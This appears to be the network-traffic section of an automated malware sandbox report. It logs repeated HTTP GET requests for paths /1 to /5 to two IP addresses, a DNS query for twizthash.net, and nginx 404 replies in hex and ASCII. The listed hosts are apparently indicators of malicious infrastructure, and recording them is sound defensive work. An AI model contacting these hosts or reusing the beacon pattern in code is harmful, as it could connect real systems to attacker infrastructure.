                  Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                  Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                  Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                  Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                  Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                  Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                  Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                  Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                  Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                  Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                  Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                  Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                  Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                  Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                  Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                  Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                  Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                  Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                  Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                  Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                  Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                  Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                  Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                  Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                  Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                  Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                  Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                  Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                  Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                  Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                  Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                  Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                  Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                  Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                  Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                  Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                  Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                  Source: global trafficDNS traffic detected: DNS query: twizthash.net
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 30 Nov 2024 00:55:37 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 30 Nov 2024 00:55:52 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 30 Nov 2024 00:55:55 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 30 Nov 2024 00:56:14 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 30 Nov 2024 00:56:26 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 30 Nov 2024 00:56:30 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
